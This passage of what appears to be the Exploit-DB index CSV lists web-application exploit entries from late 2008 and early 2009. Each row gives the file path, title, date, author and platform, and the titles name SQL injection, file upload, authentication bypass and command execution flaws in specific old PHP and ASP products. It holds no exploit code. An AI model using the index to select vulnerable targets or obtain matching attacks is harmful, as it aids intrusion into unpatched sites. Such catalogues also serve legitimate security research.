Injection",2008-12-17,StAkeR,php,webapps, -7508,exploits/asp/webapps/7508.txt,"QuickerSite Easy CMS - Database Disclosure",2008-12-17,AlpHaNiX,asp,webapps, -7509,exploits/php/webapps/7509.txt,"Mini File Host 1.x - Arbitrary '.PHP' File Upload",2008-12-18,Pouya_Server,php,webapps, -7510,exploits/php/webapps/7510.txt,"2532/Gigs 1.2.2 Stable - Multiple Vulnerabilities",2008-12-18,Osirys,php,webapps, -7511,exploits/php/webapps/7511.txt,"2532/Gigs 1.2.2 Stable - Remote Authentication Bypass",2008-12-18,StAkeR,php,webapps, -7512,exploits/php/webapps/7512.php,"2532/Gigs 1.2.2 Stable - Remote Command Execution",2008-12-18,StAkeR,php,webapps, -7513,exploits/php/webapps/7513.txt,"Calendar Script 1.1 - Insecure Cookie Handling",2008-12-18,Osirys,php,webapps, -7514,exploits/php/webapps/7514.txt,"I-Rater Basic - SQL Injection",2008-12-18,boom3rang,php,webapps, -7515,exploits/php/webapps/7515.txt,"phpclanwebsite 1.23.3 fix pack #5 - Multiple Vulnerabilities",2008-12-18,s4avrd0w,php,webapps, -7517,exploits/php/webapps/7517.txt,"Injader CMS 2.1.1 - 'id' SQL Injection",2008-12-18,fuzion,php,webapps, -7518,exploits/php/webapps/7518.txt,"Gobbl CMS 1.0 - Insecure Cookie Handling",2008-12-18,x0r,php,webapps, -7519,exploits/php/webapps/7519.txt,"MyPHPsite - Local File Inclusion",2008-12-18,Piker,php,webapps, -7522,exploits/php/webapps/7522.pl,"MyPBS - 'seasonID' SQL Injection",2008-12-19,Piker,php,webapps, -7523,exploits/php/webapps/7523.php,"ReVou Twitter Clone - Admin Password Change",2008-12-19,G4N0K,php,webapps, -7524,exploits/php/webapps/7524.txt,"Online Keyword Research Tool - 'download.php' File Disclosure",2008-12-19,"Cold Zero",php,webapps, -7525,exploits/php/webapps/7525.txt,"Extract Website - 'Filename' File Disclosure",2008-12-19,"Cold Zero",php,webapps, -7526,exploits/php/webapps/7526.txt,"myPHPscripts Login Session 2.0 - Cross-Site Scripting / Database Disclosure",2008-12-19,Osirys,php,webapps, -7527,exploits/php/webapps/7527.txt,"FreeLyrics 1.0 - Remote File Disclosure",2008-12-19,Piker,php,webapps, -7528,exploits/php/webapps/7528.pl,"OneOrZero helpdesk 1.6.x. - Arbitrary File Upload",2008-12-19,Ams,php,webapps, -7529,exploits/php/webapps/7529.txt,"Constructr CMS 3.02.5 stable - Multiple Vulnerabilities",2008-12-19,fuzion,php,webapps, -7530,exploits/php/webapps/7530.pl,"Userlocator 3.0 - Blind SQL Injection",2008-12-21,katharsis,php,webapps, -7531,exploits/php/webapps/7531.txt,"ReVou Twitter Clone - Arbitrary File Upload",2008-12-21,S.W.A.T.,php,webapps, -7532,exploits/php/webapps/7532.txt,"Chicomas 2.0.4 - Database Backup / File Disclosure / Cross-Site Scripting",2008-12-21,BugReport.IR,php,webapps, -7534,exploits/asp/webapps/7534.txt,"Emefa Guestbook 3.0 - Remote Database Disclosure",2008-12-21,Cyber.Zer0,asp,webapps, -7537,exploits/php/webapps/7537.txt,"BLOG 1.55B - 'image_upload.php' Arbitrary File Upload",2008-12-21,Piker,php,webapps, -7538,exploits/php/webapps/7538.txt,"Joomla! Component com_hbssearch 1.0 - Blind SQL Injection",2008-12-21,boom3rang,php,webapps, -7539,exploits/php/webapps/7539.txt,"Joomla! Component com_tophotelmodule 1.0 - Blind SQL Injection",2008-12-21,boom3rang,php,webapps, -7540,exploits/php/webapps/7540.txt,"phpg 1.6 - Cross-Site Scripting / Full Path Disclosure / Denial of Service",2008-12-21,"Anarchy Angel",php,webapps, -7541,exploits/php/webapps/7541.pl,"RSS Simple News - SQL Injection",2008-12-22,Piker,php,webapps, -7542,exploits/php/webapps/7542.txt,"Text Lines Rearrange Script - 'Filename' File Disclosure",2008-12-22,SirGod,php,webapps, -7543,exploits/php/webapps/7543.txt,"WordPress Plugin Page Flip Image Gallery 0.2.2 - Remote File Disclosure",2008-12-22,GoLd_M,php,webapps, -7544,exploits/php/webapps/7544.txt,"Pligg 9.9.5b - Arbitrary File Upload / SQL Injection",2008-12-22,Ams,php,webapps, -7545,exploits/php/webapps/7545.txt,"yourplace 1.0.2 - Multiple Vulnerabilities / Remote Code Execution",2008-12-22,Osirys,php,webapps, -7546,exploits/php/webapps/7546.txt,"Joomla! Component Volunteer 2.0 - SQL Injection",2008-12-22,boom3rang,php,webapps, -7548,exploits/php/webapps/7548.php,"SolarCMS 0.53.8 - 'Forum' Remote Cookies Disclosure",2008-12-22,StAkeR,php,webapps, -7549,exploits/php/webapps/7549.txt,"Roundcube Webmail 0.2-3 Beta - Code Execution",2008-12-22,"Jacobo Avariento",php,webapps, -7551,exploits/php/webapps/7551.txt,"Calendar Script 1.1 - Authentication Bypass",2008-12-22,StAkeR,php,webapps, -7552,exploits/php/webapps/7552.txt,"REDPEACH CMS - SQL Injection",2008-12-22,Lidloses_Auge,php,webapps, -7553,exploits/php/webapps/7553.sh,"Roundcube Webmail 0.2b - Remote Code Execution",2008-12-22,Hunger,php,webapps, -7557,exploits/php/webapps/7557.txt,"PHPmotion 2.1 - Cross-Site Request Forgery",2008-12-23,Ausome1,php,webapps, -7558,exploits/php/webapps/7558.txt,"PHPLD 3.3 - Blind SQL Injection",2008-12-23,fuzion,php,webapps, -7559,exploits/php/webapps/7559.php,"CMS NetCat 3.12 - 'password_recovery.php' Blind SQL Injection",2008-12-23,s4avrd0w,php,webapps, -7560,exploits/php/webapps/7560.txt,"CMS NetCat 3.12 - Multiple Vulnerabilities",2008-12-23,s4avrd0w,php,webapps, -7561,exploits/php/webapps/7561.txt,"phpGreetCards - Cross-Site Scripting / Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps, -7562,exploits/php/webapps/7562.txt,"PHPAdBoard - PHP uploads Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps, -7563,exploits/php/webapps/7563.txt,"phpEmployment - 'PHP Upload' Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps, -7565,exploits/php/webapps/7565.txt,"StormBoard 1.0.1 - SQL Injection",2008-12-23,Samir-M,php,webapps, -7567,exploits/php/webapps/7567.txt,"Joomla! Component com_lowcosthotels - Blind SQL Injection",2008-12-23,"Hussin X",php,webapps, -7568,exploits/php/webapps/7568.txt,"Joomla! Component com_allhotels - Blind SQL Injection",2008-12-23,"Hussin X",php,webapps, -7569,exploits/php/webapps/7569.txt,"doop CMS 1.4.0b - Cross-Site Request Forgery / Arbitrary File Upload",2008-12-24,x0r,php,webapps, -7570,exploits/php/webapps/7570.txt,"ILIAS 3.7.4 - 'ref_id' Blind SQL Injection",2008-12-24,Lidloses_Auge,php,webapps, -7572,exploits/php/webapps/7572.txt,"Joomla! Component Ice Gallery 0.5b2 - 'catid' Blind SQL Injection",2008-12-24,boom3rang,php,webapps, -7573,exploits/php/webapps/7573.txt,"Joomla! Component Live Ticker 1.0 - Blind SQL Injection",2008-12-24,boom3rang,php,webapps, -7574,exploits/php/webapps/7574.txt,"Joomla! Component mDigg 2.2.8 - 'category' SQL Injection",2008-12-24,boom3rang,php,webapps, -7575,exploits/php/webapps/7575.pl,"Joomla! Component 5starhotels - SQL Injection",2008-12-24,EcHoLL,php,webapps, -7576,exploits/php/webapps/7576.pl,"PHP-Fusion 7.0.2 - Blind SQL Injection",2008-12-24,StAkeR,php,webapps, -7579,exploits/php/webapps/7579.txt,"ClaSS 0.8.60 - 'export.php' Local File Inclusion",2008-12-24,fuzion,php,webapps, -7580,exploits/php/webapps/7580.txt,"BloofoxCMS 0.3.4 - 'lang' Local File Inclusion",2008-12-24,fuzion,php,webapps, -7586,exploits/php/webapps/7586.txt,"Miniweb 2.0 - Authentication Bypass",2008-12-28,bizzit,php,webapps, -7587,exploits/php/webapps/7587.txt,"Joomla! Component PAX Gallery 0.1 - Blind SQL Injection",2008-12-28,XaDoS,php,webapps, -7593,exploits/php/webapps/7593.pl,"DeluxeBB 1.2 - Blind SQL Injection",2008-12-28,StAkeR,php,webapps, -7595,exploits/php/webapps/7595.txt,"FubarForum 1.6 - Arbitrary Authentication Bypass",2008-12-28,k3yv4n,php,webapps, -7596,exploits/php/webapps/7596.txt,"Alstrasoft Web Email Script Enterprise - 'id' SQL Injection",2008-12-28,Bgh7,php,webapps, -7597,exploits/php/webapps/7597.txt,"OwenPoll 1.0 - Insecure Cookie Handling",2008-12-28,Osirys,php,webapps, -7598,exploits/php/webapps/7598.txt,"PHP-Fusion Mod TI - 'id' SQL Injection",2008-12-28,"Khashayar Fereidani",php,webapps, -7599,exploits/asp/webapps/7599.txt,"ForumApp 3.3 - Remote Database Disclosure",2008-12-28,Cyber.Zer0,asp,webapps, -7600,exploits/php/webapps/7600.pl,"Flexphplink Pro - Arbitrary File Upload",2008-12-28,Osirys,php,webapps, -7601,exploits/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 - Insecure Cookie Handling",2008-12-28,Osirys,php,webapps, -7602,exploits/php/webapps/7602.txt,"webClassifieds 2005 - Authentication Bypass",2008-12-29,AnGeL25dZ,php,webapps, -7603,exploits/php/webapps/7603.txt,"eDNews 2.0 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps, -7604,exploits/php/webapps/7604.txt,"eDContainer 2.22 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps, -7605,exploits/php/webapps/7605.php,"TaskDriver 1.3 - Remote Change Admin Password",2008-12-29,cOndemned,php,webapps, -7606,exploits/php/webapps/7606.txt,"FubarForum 1.6 - Authentication Bypass Change User Password",2008-12-29,R31P0l,php,webapps, -7607,exploits/php/webapps/7607.pl,"Ultimate PHP Board 2.2.1 - Privilege Escalation",2008-12-29,StAkeR,php,webapps, -7609,exploits/asp/webapps/7609.txt,"Sepcity Shopping Mall - SQL Injection",2008-12-29,Osmanizim,asp,webapps, -7610,exploits/asp/webapps/7610.txt,"Sepcity Lawyer Portal - SQL Injection",2008-12-29,Osmanizim,asp,webapps, -7611,exploits/php/webapps/7611.php,"CMS NetCat 3.0/3.12 - Blind SQL Injection",2008-12-29,s4avrd0w,php,webapps, -7612,exploits/php/webapps/7612.txt,"Joomla! Component com_na_content 1.0 - Blind SQL Injection",2008-12-29,"Mehmet Ince",php,webapps, -7613,exploits/asp/webapps/7613.txt,"Sepcity Classified - 'ID' SQL Injection",2008-12-29,S.W.A.T.,asp,webapps, -7614,exploits/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 - Authentication Bypass",2008-12-29,x0r,php,webapps, -7615,exploits/php/webapps/7615.txt,"Flexphpsite 0.0.1 - Authentication Bypass",2008-12-29,x0r,php,webapps, -7616,exploits/php/webapps/7616.txt,"Flexphplink 0.0.x - Authentication Bypass",2008-12-29,x0r,php,webapps, -7619,exploits/php/webapps/7619.txt,"eDNews 2.0 - SQL Injection",2008-12-29,"Virangar Security",php,webapps, -7620,exploits/php/webapps/7620.txt,"ThePortal 2.2 - Arbitrary File Upload",2008-12-29,siurek22,php,webapps, -7621,exploits/php/webapps/7621.txt,"PHPAlumni - SQL Injection",2008-12-29,Mr.SQL,php,webapps, -7622,exploits/php/webapps/7622.txt,"Flexcustomer 0.0.6 - Admin Authentication Bypass / Possible PHP Code Writing",2008-12-29,Osirys,php,webapps, -7624,exploits/php/webapps/7624.txt,"Flexphpic 0.0.x - Authentication Bypass",2008-12-30,S.W.A.T.,php,webapps, -7625,exploits/php/webapps/7625.txt,"CMScout 2.06 - SQL Injection / Local File Inclusion",2008-12-30,SirGod,php,webapps, -7626,exploits/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - Blind SQL Injection",2008-12-30,x0r,php,webapps, -7627,exploits/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - SQL Injection",2008-12-30,AlpHaNiX,asp,webapps, -7628,exploits/php/webapps/7628.txt,"Viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps, -7629,exploits/php/webapps/7629.txt,"DDL-Speed Script - 'acp/backup' Admin Backup Bypass",2009-01-01,tmh,php,webapps, -7631,exploits/php/webapps/7631.txt,"2Capsule - SQL Injection",2009-01-01,Zenith,php,webapps, -7633,exploits/php/webapps/7633.txt,"EggBlog 3.1.10 - Cross-Site Request Forgery (Change Admin Password)",2009-01-01,x0r,php,webapps, -7635,exploits/php/webapps/7635.txt,"ASPThai.Net WebBoard 6.0 - SQL Injection",2009-01-01,DaiMon,php,webapps, -7636,exploits/php/webapps/7636.pl,"PHPFootball 1.6 - Remote Hash Disclosure",2009-01-01,KinG-LioN,php,webapps, -7638,exploits/php/webapps/7638.txt,"Memberkit 1.0 - Arbitrary File Upload",2009-01-01,Lo$er,php,webapps, -7639,exploits/php/webapps/7639.txt,"phpScribe 0.9 - 'user.cfg' Remote Configuration Disclosure",2009-01-01,ahmadbady,php,webapps, -7640,exploits/php/webapps/7640.txt,"w3blabor CMS 3.3.0 - Authentication Bypass",2009-01-01,DNX,php,webapps, -7641,exploits/php/webapps/7641.txt,"PowerNews 2.5.4 - 'newsid' SQL Injection",2009-01-01,"Virangar Security",php,webapps, -7642,exploits/php/webapps/7642.txt,"PowerClan 1.14a - Authentication Bypass",2009-01-01,"Virangar Security",php,webapps, -7644,exploits/php/webapps/7644.txt,"Built2Go PHP Link Portal 1.95.1 - Arbitrary File Upload",2009-01-02,ZoRLu,php,webapps, -7645,exploits/php/webapps/7645.txt,"Built2Go PHP Rate My Photo 1.46.4 - Arbitrary File Upload",2009-01-02,ZoRLu,php,webapps, -7648,exploits/php/webapps/7648.txt,"phpskelsite 1.4 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-01-02,ahmadbady,php,webapps, -7650,exploits/php/webapps/7650.php,"Lito Lite CMS - Multiple Cross-Site Scripting / Blind SQL Injection Vulnerabilities",2009-01-03,darkjoker,php,webapps, -7653,exploits/php/webapps/7653.txt,"webSPELL 4 - Authentication Bypass",2009-01-03,anonymous,php,webapps, -7657,exploits/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Remote Edit Topics",2009-01-04,StAkeR,php,webapps, -7658,exploits/php/webapps/7658.pl,"PNPHPBB2 < 1.2i - 'ModName' Multiple Local File Inclusions",2009-01-04,StAkeR,php,webapps, -7659,exploits/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' SQL Injection",2009-01-04,DaiMon,php,webapps, -7660,exploits/php/webapps/7660.txt,"PHPMesFilms 1.0 - 'index.php?id' SQL Injection",2009-01-04,SuB-ZeRo,php,webapps, -7663,exploits/php/webapps/7663.txt,"plxAutoReminder 3.7 - 'id' SQL Injection",2009-01-04,ZoRLu,php,webapps, -7664,exploits/php/webapps/7664.pl,"The Rat CMS Alpha 2 - Blind SQL Injection",2009-01-04,darkjoker,php,webapps, -7665,exploits/asp/webapps/7665.txt,"Ayemsis Emlak Pro - 'acc.mdb' Database Disclosure",2009-01-05,ByALBAYX,asp,webapps, -7666,exploits/asp/webapps/7666.txt,"Ayemsis Emlak Pro - Authentication Bypass",2009-01-05,ByALBAYX,asp,webapps, -7667,exploits/php/webapps/7667.txt,"Joomla! Component simple_review 1.x - SQL Injection",2009-01-05,EcHoLL,php,webapps, -7668,exploits/php/webapps/7668.pl,"Cybershade CMS 0.2b - 'index.php' Remote File Inclusion",2009-01-05,JosS,php,webapps, -7669,exploits/php/webapps/7669.pl,"Joomla! Component com_na_newsdescription - 'newsid' SQL Injection",2009-01-05,EcHoLL,php,webapps, -7670,exploits/php/webapps/7670.pl,"Joomla! Component com_phocadocumentation - 'id' SQL Injection",2009-01-05,EcHoLL,php,webapps, -7672,exploits/php/webapps/7672.txt,"PHPAuctionSystem - Cross-Site Scripting / SQL Injection",2009-01-05,x0r,php,webapps, -7674,exploits/php/webapps/7674.txt,"PHPAuctionSystem - Insecure Cookie Handling",2009-01-05,ZoRLu,php,webapps, -7678,exploits/php/webapps/7678.txt,"PHPAuctionSystem - Multiple Remote File Inclusions",2009-01-06,darkmasking,php,webapps, -7679,exploits/php/webapps/7679.php,"RiotPix 0.61 - 'forumid' Blind SQL Injection",2009-01-06,cOndemned,php,webapps, -7680,exploits/php/webapps/7680.txt,"ezpack 4.2b2 - Cross-Site Scripting / SQL Injection",2009-01-06,!-BUGJACK-!,php,webapps, -7682,exploits/php/webapps/7682.txt,"RiotPix 0.61 - Authentication Bypass",2009-01-06,ZoRLu,php,webapps, -7683,exploits/php/webapps/7683.pl,"Goople 1.8.2 - 'FrontPage.php' Blind SQL Injection",2009-01-06,darkjoker,php,webapps, -7686,exploits/php/webapps/7686.txt,"ItCMS 2.1a - Authentication Bypass",2009-01-06,certaindeath,php,webapps, -7687,exploits/php/webapps/7687.txt,"PlaySms 0.9.3 - Multiple Local/Remote File Inclusions",2009-01-06,ahmadbady,php,webapps, -7689,exploits/php/webapps/7689.txt,"BlogHelper - Remote Configuration File Disclosure",2009-01-06,ahmadbady,php,webapps, -7690,exploits/php/webapps/7690.txt,"PollHelper - Remote Configuration File Disclosure",2009-01-06,ahmadbady,php,webapps, -7691,exploits/php/webapps/7691.php,"Joomla! Component xstandard editor 1.5.8 - Local Directory Traversal",2009-01-07,irk4z,php,webapps, -7697,exploits/php/webapps/7697.txt,"PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps, -7698,exploits/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 - 'items.php' SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps, -7699,exploits/php/webapps/7699.txt,"QuoteBook - Remote Configuration File Disclosure",2009-01-07,Moudi,php,webapps, -7700,exploits/php/webapps/7700.php,"CuteNews 1.4.6 - 'ip ban' Authorized Cross-Site Scripting / Command Execution",2009-01-08,StAkeR,php,webapps, -7703,exploits/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - 'comment_id' SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps, -7704,exploits/php/webapps/7704.pl,"Pizzis CMS 1.5.1 - Blind SQL Injection",2009-01-08,darkjoker,php,webapps, -7705,exploits/php/webapps/7705.pl,"XOOPS 2.3.2 - 'mydirname' PHP Remote Code Execution",2009-01-08,StAkeR,php,webapps, -7711,exploits/php/webapps/7711.txt,"Fast FAQs System - Authentication Bypass",2009-01-09,x0r,php,webapps, -7716,exploits/php/webapps/7716.pl,"Joomla! Component com_xevidmegahd - SQL Injection",2009-01-11,EcHoLL,php,webapps, -7717,exploits/php/webapps/7717.pl,"Joomla! Component com_jashowcase - 'catid' SQL Injection",2009-01-11,EcHoLL,php,webapps, -7718,exploits/php/webapps/7718.txt,"Joomla! Component com_newsflash - 'id' SQL Injection",2009-01-11,EcHoLL,php,webapps, -7719,exploits/php/webapps/7719.txt,"Fast Guest Book - Authentication Bypass",2009-01-11,Moudi,php,webapps, -7722,exploits/php/webapps/7722.txt,"DZcms 3.1 - SQL Injection",2009-01-11,"Glafkos Charalambous",php,webapps, -7723,exploits/php/webapps/7723.txt,"Seo4SMF for SMF forums - Multiple Vulnerabilities",2009-01-11,WHK,php,webapps, -7724,exploits/php/webapps/7724.php,"phpMDJ 1.0.3 - 'id_animateur' Blind SQL Injection",2009-01-11,darkjoker,php,webapps, -7725,exploits/php/webapps/7725.txt,"XOOPS Module tadbook2 - SQL Injection",2009-01-11,stylextra,php,webapps, -7726,exploits/php/webapps/7726.txt,"BKWorks ProPHP 0.50b1 - Authentication Bypass",2009-01-11,SirGod,php,webapps, -7728,exploits/php/webapps/7728.txt,"Weight Loss Recipe Book 3.1 - Authentication Bypass",2009-01-11,x0r,php,webapps, -7729,exploits/php/webapps/7729.txt,"PHP-Fusion Mod the_kroax - SQL Injection",2009-01-11,FasTWORM,php,webapps, -7730,exploits/php/webapps/7730.txt,"Social Engine - SQL Injection",2009-01-11,snakespc,php,webapps, -7731,exploits/php/webapps/7731.txt,"fttss 2.0 - Remote Command Execution",2009-01-11,dun,php,webapps, -7732,exploits/php/webapps/7732.php,"Silentum Uploader 1.4.0 - Remote File Deletion",2009-01-11,"Danny Moules",php,webapps, -7733,exploits/php/webapps/7733.txt,"Photobase 1.2 - 'Language' Local File Inclusion",2009-01-11,Osirys,php,webapps, -7734,exploits/php/webapps/7734.txt,"Joomla! Component Portfol 1.2 - 'vcatid' SQL Injection",2009-01-12,H!tm@N,php,webapps, -7735,exploits/php/webapps/7735.pl,"Simple Machines Forum (SMF) 1.0.13/1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass",2009-01-12,Xianur0,php,webapps, -7736,exploits/asp/webapps/7736.html,"Comersus Shopping Cart 6.0 - Remote User Pass",2009-01-12,ajann,asp,webapps, -7738,exploits/php/webapps/7738.txt,"WordPress Plugin WP-Forum 1.7.8 - SQL Injection",2009-01-12,seomafia,php,webapps, -7740,exploits/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Arbitrary File Upload",2009-01-12,ahmadbady,php,webapps, -7741,exploits/asp/webapps/7741.txt,"dMx READ - Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps, -7743,exploits/php/webapps/7743.txt,"Realtor 747 - 'define.php?INC_DIR' Remote File Inclusion",2009-01-12,ahmadbady,php,webapps, -7744,exploits/asp/webapps/7744.txt,"Virtual Guestbook 2.1 - Remote Database Disclosure",2009-01-13,Moudi,asp,webapps, -7746,exploits/php/webapps/7746.txt,"Joomla! Component gigCalendar 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps, -7752,exploits/asp/webapps/7752.txt,"DMXReady News Manager 1.1 - Arbitrary Category Change",2009-01-13,ajann,asp,webapps, -7753,exploits/cgi/webapps/7753.pl,"HSPell 1.1 - 'cilla.cgi' Remote Command Execution",2009-01-13,ZeN,cgi,webapps, -7754,exploits/asp/webapps/7754.txt,"DMXReady Account List Manager 1.1 - Contents Change",2009-01-13,ajann,asp,webapps, -7758,exploits/php/webapps/7758.txt,"Dark Age CMS 0.2c Beta - Authentication Bypass",2009-01-13,darkjoker,php,webapps, -7759,exploits/php/webapps/7759.txt,"Syzygy CMS 0.3 - Authentication Bypass",2009-01-14,darkjoker,php,webapps, -7761,exploits/asp/webapps/7761.txt,"Netvolution CMS 1.0 - Cross-Site Scripting / SQL Injection",2009-01-14,Ellinas,asp,webapps, -7764,exploits/php/webapps/7764.txt,"DMXReady Blog Manager 1.1 - Remote File Delete",2009-01-14,ajann,php,webapps, -7766,exploits/asp/webapps/7766.txt,"DMXReady Catalog Manager 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps, -7767,exploits/asp/webapps/7767.txt,"DMXReady Classified Listings Manager 1.1 - SQL Injection",2009-01-14,ajann,asp,webapps, -7768,exploits/asp/webapps/7768.txt,"DMXReady Contact Us Manager 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps, -7769,exploits/asp/webapps/7769.txt,"DMXReady Document Library Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps, -7770,exploits/asp/webapps/7770.txt,"DMXReady Faqs Manager 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps, -7771,exploits/asp/webapps/7771.txt,"DMXReady Job Listing 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps, -7772,exploits/asp/webapps/7772.txt,"DMXReady Links Manager 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps, -7773,exploits/asp/webapps/7773.txt,"DMXReady Member Directory Manager 1.1 - SQL Injection",2009-01-14,ajann,asp,webapps, -7774,exploits/asp/webapps/7774.txt,"DMXReady Members Area Manager 1.2 - SQL Injection",2009-01-14,ajann,asp,webapps, -7775,exploits/php/webapps/7775.txt,"Joomla! Component Camelcitydb2 2.2 - SQL Injection",2009-01-14,H!tm@N,php,webapps, -7777,exploits/php/webapps/7777.txt,"Joomla! Component Fantasytournament - SQL Injection",2009-01-14,H!tm@N,php,webapps, -7778,exploits/php/webapps/7778.txt,"phpList 2.10.8 - Local File Inclusion",2009-01-14,BugReport.IR,php,webapps, -7780,exploits/php/webapps/7780.pl,"phosheezy 2.0 - Remote Command Execution",2009-01-14,Osirys,php,webapps, -7782,exploits/asp/webapps/7782.txt,"DMXReady PayPal Store Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps, -7783,exploits/asp/webapps/7783.txt,"DMXReady Photo Gallery Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps, -7784,exploits/asp/webapps/7784.txt,"DMXReady Registration Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps, -7786,exploits/php/webapps/7786.txt,"PHP Photo Album 0.8b - 'preview' Local File Inclusion",2009-01-14,Osirys,php,webapps, -7787,exploits/php/webapps/7787.txt,"DMXReady Secure Document Library 1.1 - SQL Injection",2009-01-14,ajann,php,webapps, -7788,exploits/asp/webapps/7788.txt,"DMXReady BillboardManager 1.1 - Contents Change",2009-01-14,x0r,asp,webapps, -7789,exploits/asp/webapps/7789.txt,"DMXReady SDK 1.1 - Arbitrary File Download",2009-01-14,ajann,asp,webapps, -7791,exploits/asp/webapps/7791.txt,"DMXReady Billboard Manager 1.1 - Arbitrary File Upload",2009-01-15,ajann,asp,webapps, -7792,exploits/php/webapps/7792.txt,"GNUBoard 4.31.03 (08.12.29) - Local File Inclusion",2009-01-15,flyh4t,php,webapps, -7793,exploits/php/webapps/7793.php,"Joomla! Component com_Eventing 1.6.x - Blind SQL Injection",2009-01-15,InjEctOr5,php,webapps, -7795,exploits/php/webapps/7795.txt,"Joomla! Component RD-Autos 1.5.5 - SQL Injection",2009-01-15,H!tm@N,php,webapps, -7796,exploits/php/webapps/7796.txt,"MKPortal 1.2.1 - Multiple Vulnerabilities",2009-01-15,waraxe,php,webapps, -7797,exploits/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - 'clanek' Blind SQL Injection",2009-01-15,darkjoker,php,webapps, -7798,exploits/php/webapps/7798.txt,"Free Bible Search PHP Script - SQL Injection",2009-01-15,nuclear,php,webapps, -7800,exploits/asp/webapps/7800.txt,"eFAQ - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps, -7801,exploits/asp/webapps/7801.txt,"eReservations - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps, -7802,exploits/asp/webapps/7802.txt,"The Walking Club - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps, -7803,exploits/asp/webapps/7803.txt,"Ping IP - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps, -7805,exploits/php/webapps/7805.txt,"Rankem - File Disclosure / Cross-Site Scripting / Cookie",2009-01-16,Pouya_Server,php,webapps, -7806,exploits/php/webapps/7806.txt,"blogit! - SQL Injection / File Disclosure / Cross-Site Scripting",2009-01-16,Pouya_Server,php,webapps, -7807,exploits/asp/webapps/7807.txt,"ASP ActionCalendar 1.3 - Authentication Bypass",2009-01-16,SuB-ZeRo,asp,webapps, -7809,exploits/php/webapps/7809.txt,"Aj Classifieds Real Estate 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps, -7810,exploits/php/webapps/7810.txt,"Aj Classifieds Personals 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps, -7811,exploits/php/webapps/7811.txt,"Aj Classifieds For Sale 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps, -7813,exploits/php/webapps/7813.txt,"Simple PHP NewsLetter 1.5 - Local File Inclusion",2009-01-16,ahmadbady,php,webapps, -7814,exploits/php/webapps/7814.txt,"BibCiter 1.4 - Multiple SQL Injections",2009-01-16,nuclear,php,webapps, -7815,exploits/php/webapps/7815.txt,"Joomla! Component Gigcal 1.x - 'id' SQL Injection",2009-01-18,Lanti-Net,php,webapps, -7816,exploits/asp/webapps/7816.txt,"DS-IPN.NET Digital Sales IPN - Database Disclosure",2009-01-18,Moudi,asp,webapps, -7817,exploits/php/webapps/7817.txt,"Click&Email - Authentication Bypass",2009-01-18,SuB-ZeRo,php,webapps, -7818,exploits/php/webapps/7818.txt,"SCMS 1 - Local File Inclusion",2009-01-18,ahmadbady,php,webapps, -7819,exploits/php/webapps/7819.txt,"ESPG (Enhanced Simple PHP Gallery) 1.72 - File Disclosure",2009-01-18,bd0rk,php,webapps, -7820,exploits/php/webapps/7820.pl,"Fhimage 1.2.1 - Remote Index Change",2009-01-19,Osirys,php,webapps, -7821,exploits/php/webapps/7821.pl,"Fhimage 1.2.1 - Remote Command Execution (mq = off)",2009-01-19,Osirys,php,webapps, -7824,exploits/php/webapps/7824.pl,"Joomla! Component com_pccookbook - 'recipe_id' Blind SQL Injection",2009-01-19,InjEctOr5,php,webapps, -7828,exploits/php/webapps/7828.txt,"Joomla! Component com_news - SQL Injection",2009-01-19,snakespc,php,webapps, -7829,exploits/php/webapps/7829.txt,"Gallery Kys 1.0 - Admin Password Disclosure / Persistent Cross-Site Scripting",2009-01-19,Osirys,php,webapps, -7830,exploits/php/webapps/7830.txt,"RCBlog 1.03 - Authentication Bypass",2009-01-19,"Danny Moules",php,webapps, -7831,exploits/php/webapps/7831.txt,"Ninja Blog 4.8 - Remote Information Disclosure",2009-01-19,"Danny Moules",php,webapps, -7832,exploits/php/webapps/7832.txt,"phpads 2.0 - Multiple Vulnerabilities",2009-01-19,"Danny Moules",php,webapps, -7833,exploits/php/webapps/7833.php,"Joomla! Component com_waticketsystem - Blind SQL Injection",2009-01-19,InjEctOr5,php,webapps, -7834,exploits/php/webapps/7834.txt,"Ninja Blog 4.8 - Cross-Site Request Forgery/HTML Injection",2009-01-19,"Danny Moules",php,webapps, -7835,exploits/php/webapps/7835.html,"Max.Blog 1.0.6 - Arbitrary Delete Post",2009-01-20,SirGod,php,webapps, -7836,exploits/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 - 'id' SQL Injection",2009-01-20,snakespc,php,webapps, -7837,exploits/php/webapps/7837.pl,"LinPHA Photo Gallery 2.0 